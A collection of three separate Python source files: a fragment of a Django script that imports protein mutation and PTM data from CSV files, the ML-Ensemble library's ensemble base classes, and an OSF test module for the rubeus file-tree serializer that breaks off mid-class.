self.logger.info('Created SNP for '+ str(sequence_number) + ' for protein ' + str(p.name))
# except:
# # self.logger.error('Failed creating SNP for ' + sequence_number + ' for protein ' + p.name)
self.logger.info('COMPLETED CREATING CANCER MUTATIONS')
def create_disease_mutations(self, filenames=False):
self.logger.info('CREATING DISEASE MUTATIONS')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('disease.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
disease_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(disease_data.iterrows()):
entry_name = disease_data[index:index+1]['EntryName'].values[0]
sequence_number = disease_data[index:index+1]['site'].values[0]
amino_acid = disease_data[index:index+1]['variant'].values[0]
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
print('No residue number for', str(sequence_number), "in ", p.name)
# self.logger.warning('No residue number for', res, "in ", p.name)
continue
if res:
# try:
disease, created = DiseaseMutations.objects.get_or_create(protein=p, residue=res, amino_acid=amino_acid)
if created:
self.logger.info('Created SNP for ' + str(sequence_number) + ' for protein ' + str(p.name))
# except:
# print('No Cancer mutation created for', sequence_number, "in ", p.name)
# continue
# self.logger.error('Failed creating SNP for ' + sequence_number + ' for protein ' + p.name)
self.logger.info('COMPLETED CREATING DISEASE MUTATIONS')
def create_PTMs(self, filenames=False):
self.logger.info('CREATING PTM SITES')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('ptms.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
ptm_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(ptm_data.iterrows()):
entry_name = ptm_data[index:index+1]['EntryName'].values[0]
sequence_number = ptm_data[index:index+1]['SequenceNumber'].values[0]
modification = ptm_data[index:index+1]['Type'].values[0]
# source = ptm_data[index:index+1]['Source'].values[0]
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
continue
if res:
# g = PTMsType.objects.get_or_create(modification=modification)
snp, created = PTMs.objects.get_or_create(protein=p, residue=res, modification=modification) #
self.logger.info('COMPLETED CREATING PTM SITES')
|
|
"""ML-ENSEMBLE
:author: Sebastian Flennerhag
:copyright: 2017-2018
:licence: MIT
Base classes for ensemble layer management.
"""
# pylint: disable=protected-access
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
from __future__ import division, print_function, with_statement
from abc import ABCMeta, abstractmethod
import warnings
from .. import config
from ..parallel import Layer, ParallelProcessing, make_group
from ..parallel.base import BaseStacker
from ..externals.sklearn.validation import check_random_state
from ..utils import (check_ensemble_build, print_time,
safe_print, IdTrain, format_name)
from ..utils.exceptions import (
LayerSpecificationWarning, NotFittedError, NotInitializedError)
from ..metrics import Data
from ..externals.sklearn.base import BaseEstimator, clone
try:
# Try get performance counter
from time import perf_counter as time
except ImportError:
# Fall back on wall clock
from time import time
GLOBAL_SEQUENTIAL_NAME = list()
def check_kwargs(kwargs, forbidden):
"""Pop unwanted arguments and issue warning"""
for f in forbidden:
s = kwargs.pop(f, None)
if s is not None:
warnings.warn(
"Layer-specific parameter '%s' contradicts"
"ensemble-wide settings. Ignoring." % f,
LayerSpecificationWarning)
def print_job(lc, start_message):
"""Print job details.
Parameters
----------
lc : :class:`Sequential`
The LayerContainer instance running the job.
start_message : str
Initial message.
"""
f = "stdout" if lc.verbose < 10 else "stderr"
if lc.verbose:
safe_print("\n%s %d layers" % (start_message, len(lc.stack)),
file=f, flush=True)
if lc.verbose >= 5:
safe_print("""[INFO] n_jobs = %i
[INFO] backend = %r
[INFO] start_method = %r
[INFO] cache = %r
""" % (lc.n_jobs, lc.backend, config.get_start_method(), config.get_tmpdir()),
file=f, flush=True)
t0 = time()
return f, t0
###############################################################################
class Sequential(BaseStacker):
r"""Container class for a stack of sequentially processed estimators.
The Sequential class stories all layers as an ordered dictionary
and modifies possesses a ``get_params`` method to appear as an estimator
in the Scikit-learn API. This allows correct cloning and parameter
updating.
Parameters
----------
stack: list, optional (default = None)
list of estimators (i.e. layers) to build instance with.
n_jobs : int (default = -1)
Degree of concurrency. Set ``n_jobs = -1`` for maximal parallelism and
``n_jobs=1`` for sequential processing.
backend : str, (default="threading")
the joblib backend to use (i.e. "multiprocessing" or "threading").
raise_on_exception : bool (default = False)
raise error on soft exceptions. Otherwise issue warning.
verbose : int or bool (default = False)
level of verbosity.
- ``verbose = 0`` silent (same as ``verbose = False``)
- ``verbose = 1`` messages at start and finish
(same as ``verbose = True``)
- ``verbose = 2`` messages for each layer
- etc
If ``verbose >= 10`` prints to ``sys.stderr``, else ``sys.stdout``.
"""
def __init__(self, name=None, verbose=False, stack=None, **kwargs):
if stack and not isinstance(stack, list):
if stack.__class__.__name__.lower() == 'layer':
stack = [stack]
else:
raise ValueError(
"Expect stack to be a Layer or a list of Layers. "
"Got %r" % stack)
name = format_name(name, 'sequential', GLOBAL_SEQUENTIAL_NAME)
super(Sequential, self).__init__(
stack=stack, name=name, verbose=verbose, **kwargs)
def __iter__(self):
"""Generator for stacked layers"""
for layer in self.stack:
yield layer
def fit(self, X, y=None, **kwargs):
r"""Fit instance.
Iterative fits each layer in the stack on the output of
the subsequent layer. First layer is fitted on input data.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for fitting and predicting.
y : array-like of shape = [n_samples, ]
training labels.
**kwargs : optional
optional arguments to processor
"""
if not self.__stack__:
raise NotInitializedError("No elements in stack to fit.")
f, t0 = print_job(self, "Fitting")
with ParallelProcessing(self.backend, self.n_jobs,
max(self.verbose - 4, 0)) as manager:
out = manager.stack(self, 'fit', X, y, **kwargs)
if self.verbose:
print_time(t0, "{:<35}".format("Fit complete"), file=f)
if out is None:
return self
return out
def fit_transform(self, X, y=None, **kwargs):
r"""Fit instance and return cross-validated predictions.
Equivalent to ``Sequential().fit(X, y, return_preds=True)``
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for fitting and predicting.
y : array-like of shape = [n_samples, ]
training labels.
**kwargs : optional
optional arguments to processor
"""
return self.fit(X, y, return_preds=True, **kwargs)
def predict(self, X, **kwargs):
r"""Predict.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
**kwargs : optional
optional keyword arguments.
Returns
-------
X_pred : array-like of shape = [n_samples, n_fitted_estimators]
predictions from final layer.
"""
if not self.__fitted__:
NotFittedError("Instance not fitted.")
f, t0 = print_job(self, "Predicting")
out = self._predict(X, 'predict', **kwargs)
if self.verbose:
print_time(t0, "{:<35}".format("Predict complete"),
file=f, flush=True)
return out
def transform(self, X, **kwargs):
"""Predict using sub-learners as is done during the ``fit`` call.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
*args : optional
optional arguments.
**kwargs : optional
optional keyword arguments.
Returns
-------
X_pred : array-like of shape = [n_test_samples, n_fitted_estimators]
predictions from ``fit`` call to final layer.
"""
if not self.__fitted__:
NotFittedError("Instance not fitted.")
f, t0 = print_job(self, "Transforming")
out = self._predict(X, 'transform', **kwargs)
if self.verbose:
print_time(t0, "{:<35}".format("Transform complete"),
file=f, flush=True)
return out
def _predict(self, X, job, **kwargs):
r"""Generic for processing a predict job through all layers.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
job : str
type of prediction. Should be 'predict' or 'transform'.
Returns
-------
X_pred : array-like
predictions from final layer. Either predictions from ``fit`` call
or new predictions on X using base learners fitted on all training
data.
"""
r = kwargs.pop('return_preds', True)
with ParallelProcessing(self.backend, self.n_jobs,
max(self.verbose - 4, 0)) as manager:
out = manager.stack(self, job, X, return_preds=r, **kwargs)
if not isinstance(out, list):
out = [out]
out = [p.squeeze() for p in out]
if len(out) == 1:
out = out[0]
return out
@property
def data(self):
"""Ensemble data"""
out = list()
for layer in self.stack:
d = layer.raw_data
if not d:
continue
out.extend([('%s/%s' % (layer.name, k), v) for k, v in d])
return Data(out)
###############################################################################
class BaseEnsemble(BaseEstimator):
"""BaseEnsemble class.
Core ensemble class methods used to add ensemble layers and manipulate
parameters.
Parameters
----------
model_selection: bool (default=False)
Whether to use the ensemble in model selection mode. If ``True``,
this will alter the ``transform`` method. When calling ``transform``
on new data, the ensemble will call ``predict``, while calling
``transform`` with the training data reproduces predictions from the
``fit`` call. Hence the ensemble can be used as a pure transformer
in a preprocessing pipeline passed to the :class:`Evaluator`, as
training folds are faithfully reproduced as during a ``fit``call and
test folds are transformed with the ``predict`` method.
samples_size: int (default=20)
size of training set sample
(``[min(sample_size, X.size[0]), min(X.size[1], sample_size)]``
shuffle: bool (default=False)
whether to shuffle input data during fit calls
random_state: bool (default=False)
random seed.
scorer: obj, optional
scorer function
verbose: bool, optional
verbosity
samples_size: int (default=20)
size of training set sample
(``[min(sample_size, X.size[0]), min(X.size[1], sample_size)]``
"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(
self, shuffle=False, random_state=None, scorer=None, verbose=False,
layers=None, array_check=None, model_selection=False, sample_size=20,
**kwargs):
self.shuffle = shuffle
self.random_state = random_state
self.scorer = scorer
self._model_selection = model_selection
self._verbose = verbose
self.layers = layers if layers else list()
self.sample_size = sample_size
self.model_selection = model_selection
self._backend = Sequential(verbose=verbose, **kwargs)
self.raise_on_exception = self._backend.raise_on_exception
if layers:
layers_ = clone(layers)
self._backend.push(*layers_)
if array_check is not None:
warnings.warn(
"array checking is deprecated. The array_check argument will be removed in 0.2.4.",
DeprecationWarning)
def add(self, estimators, indexer, preprocessing=None, **kwargs):
"""Method for adding a layer.
Parameters
-----------
estimators: dict of lists or list of estimators, or `:class:`Layer`.
Pre-made layer or estimators to construct layer with.
If ``preprocessing`` is ``None`` or ``list``, ``estimators`` should
be a ``list``. The list can either contain estimator instances,
named tuples of estimator instances, or a combination of both. ::
option_1 = [estimator_1, estimator_2]
option_2 = [("est-1", estimator_1), ("est-2", estimator_2)]
option_3 = [estimator_1, ("est-2", estimator_2)]
If different preprocessing pipelines are desired, a dictionary
that maps estimators to preprocessing pipelines must be passed.
The names of the estimator dictionary must correspond to the
names of the estimator dictionary. ::
preprocessing_cases = {"case-1": [trans_1, trans_2].
"case-2": [alt_trans_1, alt_trans_2]}
estimators = {"case-1": [est_a, est_b].
"case-2": [est_c, est_d]}
The lists for each dictionary entry can be any of ``option_1``,
``option_2`` and ``option_3``.
indexer : instance or None (default = None)
Indexer instance to use. Defaults to the layer class
indexer with default settings. See :mod:`mlens.base` for details.
preprocessing: dict of lists or list, optional (default = None)
preprocessing pipelines for given layer. If
the same preprocessing applies to all estimators, ``preprocessing``
should be a list of transformer instances. The list can contain the
instances directly, named tuples of transformers,
or a combination of both. ::
option_1 = [transformer_1, transformer_2]
option_2 = [("trans-1", transformer_1),
("trans-2", transformer_2)]
option_3 = [transformer_1, ("trans-2", transformer_2)]
If different preprocessing pipelines are desired, a dictionary
that maps preprocessing pipelines must be passed. The names of the
preprocessing dictionary must correspond to the names of the
estimator dictionary. ::
preprocessing_cases = {"case-1": [trans_1, trans_2].
"case-2": [alt_trans_1, alt_trans_2]}
estimators = {"case-1": [est_a, est_b].
"case-2": [est_c, est_d]}
The lists for each dictionary entry can be any of ``option_1``,
``option_2`` and ``option_3``.
**kwargs : optional
keyword arguments to be passed onto the layer at instantiation.
Returns
----------
self : instance
Modified instance.
"""
lyr = self._build_layer(estimators, indexer, preprocessing, **kwargs)
self.layers.append(clone(lyr))
setattr(self, lyr.name.replace('-', '_'), lyr)
self._backend.push(lyr)
return self
def replace(self, idx, estimators, indexer, preprocessing=None, **kwargs):
"""Replace a layer.
Replace a layer in the stack with a new layer.
See :func:`add` for full parameter documentation.
Parameters
-----------
idx: int
Position in stack of layer to replace. Indexing is 0-based.
estimators: dict of lists or list of estimators, or `:class:`Layer`.
Pre-made layer or estimators to construct layer with.
indexer : instance or None (default = None)
Indexer instance to use. Defaults to the layer class
indexer with default settings. See :mod:`mlens.base` for details.
preprocessing: dict of lists or list, optional (default = None)
preprocessing pipelines for given layer.
**kwargs : optional
keyword arguments to be passed onto the layer at instantiation.
Returns
----------
self : instance
Modified instance
"""
lyr = self._build_layer(estimators, indexer, preprocessing, **kwargs)
self.layers[idx] = clone(lyr)
setattr(self, lyr.name.replace('-', '_'), lyr)
self._backend.replace(idx, lyr)
return self
def remove(self, idx):
"""Remove a layer from stack
Remove a layer at a given position from stack.
Parameters
----------
idx: int
Position in stack. Indexing is 0-based.
Returns
-------
self: instance
Modified instance
"""
name = self.layers[idx].name
self.layers.pop(idx)
delattr(self, name.replace('-', '_'))
self._backend.pop(idx)
return self
def fit(self, X, y=None, **kwargs):
"""Fit ensemble.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for prediction.
y : array-like of shape = [n_samples, ] or None (default = None)
output vector to trained estimators on.
Returns
-------
self : instance
class instance with fitted estimators.
"""
if not check_ensemble_build(self._backend):
# No layers instantiated, but raise_on_exception is False
return self
if self.model_selection:
self._id_train.fit(X)
out = self._backend.fit(X, y, **kwargs)
if out is not self._backend:
# fit_transform
return out
else:
return self
def transform(self, X, y=None, **kwargs):
"""Transform with fitted ensemble.
Replicates cross-validated prediction process from training.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
input matrix to be used for prediction.
y : array-like, shape[n_samples, ]
targets. Needs to be passed as input in model selection mode as
some indexers will reduce the size of the input array (X) and
y must be adjusted accordingly.
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array. If in model selection mode,
return a tuple ``(X_trans, y_trans)`` where ``y_trans`` is either
``y``, or a trunctated version to match the samples in ``X_trans``.
"""
if not check_ensemble_build(self._backend):
# No layers instantiated, but raise_on_exception is False
return
if self.model_selection:
if y is None:
raise TypeError(
"In model selection mode, y is a required argument.")
# Need to modify the transform method to account for blending
# cutting X in size, so y needs to be cut too
if not self._id_train.is_train(X):
return self.predict(X, **kwargs), y
# Asked to reproduce predictions during fit, here we need to
# account for that in model selection mode,
# blend ensemble will cut X in observation size so need to adjust y
X = self._backend.transform(X, **kwargs)
if X.shape[0] != y.shape[0]:
r = y.shape[0] - X.shape[0]
y = y[r:]
return X, y
return self._backend.transform(X, **kwargs)
def fit_transform(self, X, y, **kwargs):
r"""Fit ensemble and return cross-validated predictions.
Equivalent to ``ensemble.fit(X, y).transform(X)``, but more efficient.
Parameters
-----------
X : array-like of shape = [n_samples, n_features]
input matrix to be used for fitting and predicting.
y : array-like of shape = [n_samples, ]
training labels.
**kwargs : optional
optional arguments to processor
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array. If in model selection mode,
return a tuple ``(X_trans, y_trans)`` where ``y_trans`` is either
``y``, or a trunctated version to match the samples in ``X_trans``.
"""
kwargs.pop('return_preds', None)
return self.fit(X, y, return_preds=True)
def predict(self, X, **kwargs):
"""Predict with fitted ensemble.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
input matrix to be used for prediction.
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array.
"""
if not check_ensemble_build(self._backend):
# No layers instantiated, but raise_on_exception is False
return
return self._backend.predict(X, **kwargs)
def predict_proba(self, X, **kwargs):
"""Predict class probabilities with fitted ensemble.
Compatibility method for Scikit-learn. This method checks that the
final layer has ``proba=True``, then calls the regular ``predict``
method.
Parameters
----------
X : array-like, shape=[n_samples, n_features]
input matrix to be used for prediction.
Returns
-------
pred : array-like or tuple, shape=[n_samples, n_features]
predictions for provided input array.
"""
kwargs.pop('proba', None)
return self.predict(X, proba=True, **kwargs)
def _build_layer(self, estimators, indexer, preprocessing, **kwargs):
"""Build a layer from estimators and preprocessing pipelines"""
# --- check args ---
# Arguments that cannot be very between layers
check_kwargs(kwargs, ['backend', 'n_jobs'])
# Pop layer kwargs and override Sequential args
verbose = kwargs.pop('verbose', max(self._backend.verbose - 1, 0))
dtype = kwargs.pop('dtype', self._backend.dtype)
propagate = kwargs.pop('propagate_features', None)
shuffle = kwargs.pop('shuffle', self.shuffle)
random_state = kwargs.pop('random_state', self.random_state)
rs = kwargs.pop('raise_on_exception', self.raise_on_exception)
if random_state:
random_state = check_random_state(random_state).randint(0, 10000)
# Set learner kwargs
kwargs['verbose'] = max(verbose - 1, 0)
kwargs['scorer'] = kwargs.pop('scorer', self.scorer)
# Check estimator and preprocessing formatting
group = make_group(indexer, estimators, preprocessing, kwargs)
# --- layer ---
name = "layer-%i" % (len(self._backend.stack) + 1) # Start count at 1
lyr = Layer(
name=name, dtype=dtype, shuffle=shuffle,
random_state=random_state, verbose=verbose,
raise_on_exception=rs, propagate_features=propagate)
lyr.push(group)
return lyr
@property
def model_selection(self):
"""Turn model selection mode"""
return self._model_selection
@model_selection.setter
def model_selection(self, model_selection):
"""Turn model selection on or off"""
self._model_selection = model_selection
if self._model_selection:
self._id_train = IdTrain(self.sample_size)
else:
self._id_train = None
@property
def data(self):
"""Fit data"""
return self._backend.data
@property
def verbose(self):
"""Level of printed messages"""
return self._verbose
@verbose.setter
def verbose(self, value):
"""Set level of printed messages"""
self._verbose = value
self._backend.verbose = value
|
|
#!/usr/bin/env python
# encoding: utf-8
import os
from types import NoneType
from xmlrpclib import DateTime
import mock
from nose.tools import *
from webtest_plus import TestApp
from tests.base import OsfTestCase
from tests.factories import (UserFactory, ProjectFactory, NodeFactory,
AuthFactory, PointerFactory, DashboardFactory, FolderFactory, RegistrationFactory)
from framework.auth import Auth
from website.util import rubeus, api_url_for
import website.app
from website.util.rubeus import sort_by_name
from website.settings import ALL_MY_REGISTRATIONS_ID, ALL_MY_PROJECTS_ID, \
ALL_MY_PROJECTS_NAME, ALL_MY_REGISTRATIONS_NAME, DISK_SAVING_MODE
class TestRubeus(OsfTestCase):
def setUp(self):
super(TestRubeus, self).setUp()
self.project = ProjectFactory.build()
self.consolidated_auth = Auth(user=self.project.creator)
self.non_authenticator = UserFactory()
self.project.save()
self.project.add_contributor(
contributor=self.non_authenticator,
auth=self.consolidated_auth,
)
self.project.add_addon('s3', self.consolidated_auth)
self.project.creator.add_addon('s3', self.consolidated_auth)
self.node_settings = self.project.get_addon('s3')
self.user_settings = self.project.creator.get_addon('s3')
self.user_settings.access_key = 'We-Will-Rock-You'
self.user_settings.secret_key = 'Idontknowanyqueensongs'
self.node_settings.bucket = 'Sheer-Heart-Attack'
self.node_settings.user_settings = self.user_settings
self.node_settings.save()
def test_hgrid_dummy(self):
node_settings = self.node_settings
node = self.project
user = Auth(self.project.creator)
# FIXME: These tests are very brittle.
expected = {
'isPointer': False,
'provider': 's3',
'addonFullname': node_settings.config.full_name,
'iconUrl': node_settings.config.icon_url,
'name': 'Amazon S3: {0}'.format(
node_settings.bucket
),
'kind': 'folder',
'accept': {
'maxSize': node_settings.config.max_file_size,
'acceptedFiles': node_settings.config.accept_extensions
},
'isAddonRoot': True,
'extra': None,
'buttons': None,
'nodeId': node._id,
'nodeUrl': node.url,
'nodeApiUrl': node.api_url,
}
permissions = {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
}
expected['permissions'] = permissions
actual = rubeus.build_addon_root(node_settings, node_settings.bucket, permissions=permissions)
assert actual['urls']['fetch']
assert actual['urls']['upload']
del actual['urls']
assert_equals(actual, expected)
def test_build_addon_root_has_correct_upload_limits(self):
self.node_settings.config.max_file_size = 10
self.node_settings.config.high_max_file_size = 20
node = self.project
user = self.project.creator
auth = Auth(user)
permissions = {
'view': node.can_view(auth),
'edit': node.can_edit(auth) and not node.is_registration,
}
result = rubeus.build_addon_root(
self.node_settings,
self.node_settings.bucket,
permissions=permissions,
user=user
)
assert_equal(result['accept']['maxSize'], self.node_settings.config.max_file_size)
# user now has elevated upload limit
user.system_tags.append('high_upload_limit')
user.save()
result = rubeus.build_addon_root(
self.node_settings,
self.node_settings.bucket,
permissions=permissions,
user=user
)
assert_equal(
result['accept']['maxSize'],
self.node_settings.config.high_max_file_size
)
def test_hgrid_dummy_fail(self):
node_settings = self.node_settings
node = self.project
user = Auth(self.project.creator)
rv = {
'isPointer': False,
'addon': 's3',
'addonFullname': node_settings.config.full_name,
'iconUrl': node_settings.config.icon_url,
'name': 'Amazon S3: {0}'.format(
node_settings.bucket
),
'kind': 'folder',
'permissions': {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
},
'urls': {
'fetch': node.api_url + 's3/hgrid/',
'upload': node.api_url + 's3/upload/'
},
'accept': {
'maxSize': node_settings.config.max_file_size,
'acceptedFiles': node_settings.config.accept_extensions
},
'isAddonRoot': True,
'nodeId': node._id,
'nodeUrl': node.url,
'nodeApiUrl': node.api_url,
}
permissions = {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
}
assert_not_equals(rubeus.build_addon_root(
node_settings, node_settings.bucket, permissions=permissions), rv)
def test_hgrid_dummy_overrides(self):
node_settings = self.node_settings
node = self.project
user = Auth(self.project.creator)
expected = {
'isPointer': False,
'provider': 's3',
'addonFullname': node_settings.config.full_name,
'iconUrl': node_settings.config.icon_url,
'name': 'Amazon S3: {0}'.format(
node_settings.bucket
),
'kind': 'folder',
'permissions': {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
},
'urls': {},
'accept': {
'maxSize': node_settings.config.max_file_size,
'acceptedFiles': node_settings.config.accept_extensions
},
'isAddonRoot': True,
'extra': None,
'buttons': None,
'nodeId': node._id,
'nodeUrl': node.url,
'nodeApiUrl': node.api_url,
}
permissions = {
'view': node.can_view(user),
'edit': node.can_edit(user) and not node.is_registration,
}
assert_equal(
rubeus.build_addon_root(
node_settings, node_settings.bucket,
permissions=permissions, urls={}
),
expected
)
def test_serialize_private_node(self):
user = UserFactory()
auth = Auth(user=user)
public = ProjectFactory.build(is_public=True)
# Add contributor with write permissions to avoid admin permission cascade
public.add_contributor(user, permissions=['read', 'write'])
public.save()
private = ProjectFactory(parent=public, is_public=False)
NodeFactory(parent=private)
collector = rubeus.NodeFileCollector(node=public, auth=auth)
private_dummy = collector._serialize_node(private)
assert_false(private_dummy['permissions']['edit'])
assert_false(private_dummy['permissions']['view'])
assert_equal(private_dummy['name'], 'Private Component')
assert_equal(len(private_dummy['children']), 0)
def test_collect_components_deleted(self):
node = NodeFactory(creator=self.project.creator, parent=self.project)
node.is_deleted = True
collector = rubeus.NodeFileCollector(
self.project, Auth(user=UserFactory())
)
nodes = collector._collect_components(self.project, visited=[])
assert_equal(len(nodes), 0)
def test_serialized_pointer_has_flag_indicating_its_a_pointer(self):
pointer = PointerFactory()
serializer = rubeus.NodeFileCollector(node=pointer, auth=self.consolidated_auth)
ret = serializer._serialize_node(pointer)
assert_true(ret['isPointer'])
# TODO: Make this more reusable across test modules
mock_addon = mock.Mock()
serialized = {
'addon': 'mockaddon',
'name': 'Mock Addon',
'isAddonRoot': True,
'extra': '',
'permissions': {'view': True, 'edit': True},
'urls': {
'fetch': '/fetch',
'delete': '/delete'
}
}
mock_addon.config.get_hgrid_data.return_value = [serialized]
class TestSerializingNodeWithAddon(OsfTestCase):
def setUp(self):
super(TestSerializingNodeWithAddon, self).setUp()
self.auth = AuthFactory()
self.project = ProjectFactory(creator=self.auth.user)
self.project.get_addons = mock.Mock()
self.project.get_addons.return_value = [mock_addon]
self.serializer = rubeus.NodeFileCollector(node=self.project, auth=self.auth)
def test_collect_addons(self):
ret = self.serializer._collect_addons(self.project)
assert_equal(ret, [serialized])
def test_sort_by_name(self):
files = [
{'name': 'F.png'},
{'name': 'd.png'},
{'name': 'B.png'},
{'name': 'a.png'},
{'name': 'c.png'},
{'name': 'e.png'},
{'name': 'g.png'},
]
sorted_files = [
{'name': 'a.png'},
{'name': 'B.png'},
{'name': 'c.png'},
{'name': 'd.png'},
{'name': 'e.png'},
{'name': 'F.png'},
{'name': 'g.png'},
]
ret = sort_by_name(files)
for index, value in enumerate(ret):
assert_equal(value['name'], sorted_files[index]['name'])
def test_sort_by_name_none(self):
files = None
sorted_files = None
ret = sort_by_name(files)
assert_equal(ret, sorted_files)
def test_serialize_node(self):
ret = self.serializer._serialize_node(self.project)
assert_equal(
len(ret['children']),
len(self.project.get_addons.return_value) + len(self.project.nodes)
)
assert_equal(ret['kind'], rubeus.FOLDER)
assert_equal(ret['name'], 'Project: {0}'.format(self.project.title))
assert_equal(
ret['permissions'],
{
'view': True,
'edit': True,
}
)
assert_equal(
ret['urls'],
{
'upload': None,
'fetch': None,
},
)
def test_collect_js_recursive(self):
self.project.get_addons.return_value[0].config.include_js = {'files': ['foo.js']}
self.project.get_addons.return_value[0].config.short_name = 'dropbox'
node = NodeFactory(parent=self.project)
mock_node_addon = mock.Mock()
mock_node_addon.config.include_js = {'files': ['bar.js', 'baz.js']}
mock_node_addon.config.short_name = 'dropbox'
node.get_addons = mock.Mock()
node.get_addons.return_value = [mock_node_addon]
result = rubeus.collect_addon_js(self.project)
assert_in('foo.js', result)
assert_in('bar.js', result)
assert_in('baz.js', result)
def test_collect_js_unique(self):
self.project.get_addons.return_value[0].config.include_js = {'files': ['foo.js']}
self.project.get_addons.return_value[0].config.short_name = 'dropbox'
node = NodeFactory(parent=self.project)
mock_node_addon = mock.Mock()
mock_node_addon.config.include_js = {'files': ['foo.js', 'baz.js']}
mock_node_addon.config.short_name = 'dropbox'
node.get_addons = mock.Mock()
node.get_addons.return_value = [mock_node_addon]
result = rubeus.collect_addon_js(self.project)
assert_in('foo.js', result)
assert_in('baz.js', result)
class TestSerializingEmptyDashboard(OsfTestCase):
def setUp(self):
super(TestSerializingEmptyDashboard, self).setUp()
self.dash = DashboardFactory()
self.auth = AuthFactory(user=self.dash.creator)
self.dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
def test_empty_dashboard_hgrid_representation_is_list(self):
assert_is_instance(self.dash_hgrid, list)
def test_empty_dashboard_has_proper_number_of_smart_folders(self):
assert_equal(len(self.dash_hgrid), 2)
def test_empty_dashboard_smart_folders_have_correct_names_and_ids(self):
for node_hgrid in self.dash_hgrid:
assert_in(node_hgrid['name'], (ALL_MY_PROJECTS_NAME, ALL_MY_REGISTRATIONS_NAME))
for node_hgrid in self.dash_hgrid:
if node_hgrid['name'] == ALL_MY_PROJECTS_ID:
assert_equal(node_hgrid['node_id'], ALL_MY_PROJECTS_ID)
elif node_hgrid['name'] == ALL_MY_REGISTRATIONS_ID:
assert_equal(node_hgrid['node_id'], ALL_MY_REGISTRATIONS_ID)
def test_empty_dashboard_smart_folders_are_empty(self):
for node_hgrid in self.dash_hgrid:
assert_equal(node_hgrid['children'], [])
def test_empty_dashboard_are_valid_folders(self):
for node in self.dash_hgrid:
assert_valid_hgrid_folder(node)
def test_empty_dashboard_smart_folders_are_valid_smart_folders(self):
for node in self.dash_hgrid:
assert_valid_hgrid_smart_folder(node)
class TestSerializingPopulatedDashboard(OsfTestCase):
def setUp(self):
super(TestSerializingPopulatedDashboard, self).setUp()
self.dash = DashboardFactory()
self.user = self.dash.creator
self.auth = AuthFactory(user=self.user)
self.init_dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
def test_dashboard_adding_one_folder_increases_size_by_one(self):
folder = FolderFactory(creator=self.user)
self.dash.add_pointer(folder, self.auth)
dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
assert_equal(len(dash_hgrid), len(self.init_dash_hgrid) + 1)
def test_dashboard_adding_one_folder_does_not_remove_smart_folders(self):
folder = FolderFactory(creator=self.user)
self.dash.add_pointer(folder, self.auth)
dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
assert_true(
{ALL_MY_PROJECTS_NAME, ALL_MY_REGISTRATIONS_NAME, folder.title} <=
{node_hgrid['name'] for node_hgrid in dash_hgrid}
)
def test_dashboard_adding_one_folder_increases_size_by_one_in_hgrid_representation(self):
folder = FolderFactory(creator=self.user)
self.dash.add_pointer(folder, self.auth)
project = ProjectFactory(creator=self.user)
folder.add_pointer(project,self.auth)
dash_hgrid = rubeus.to_project_hgrid(self.dash, self.auth)
assert_equal(len(dash_hgrid), len(self.init_dash_hgrid) + 1)
class TestSerializingFolders(OsfTestCase):
def setUp(self):
super(TestSerializingFolders, self).setUp()
self.user = UserFactory()
self.auth = AuthFactory(user=self.user)
def test_serialized_folder_is_valid_folder(self):
folder = FolderFactory(creator=self.user)
folder_hgrid = rubeus.to_project_hgrid(folder, self.auth)
assert_equal(folder_hgrid, [])
def test_serialize_folder_containing_folder_increases_size_by_one(self):
outer_folder = FolderFactory(creator=self.user)
folder_hgrid = rubeus.to_project_hgrid(outer_folder, self.auth)
inner_folder = FolderFactory(creator=self.user)
outer_folder.add_pointer(inner_folder, self.auth)
new_hgrid = rubeus.to_project_hgrid(outer_folder, self.auth)
assert_equal(len(folder_hgrid) + 1, len(new_hgrid))
class TestSmartFolderViews(OsfTestCase):
def setUp(self):
super(TestSmartFolderViews, self).setUp()
self.dash = DashboardFactory()
self.user = self.dash.creator
self.auth = AuthFactory(user=self.user)
@mock.patch('website.project.decorators.Auth.from_kwargs')
def test_adding_project_to_dashboard_increases_json_size_by_one(self, mock_from_kwargs):
mock_from_kwargs.return_value = Auth(user=self.user)
url = api_url_for('get_dashboard')
res = self.app.get(url + ALL_MY_PROJECTS_ID)
init_len = len(res.json[u'data'])
ProjectFactory(creator=self.user)
res = self.app.get(url + ALL_MY_PROJECTS_ID)
assert_equal(len(res.json[u'data']), init_len + 1)
@mock.patch('website.project.decorators.Auth.from_kwargs')
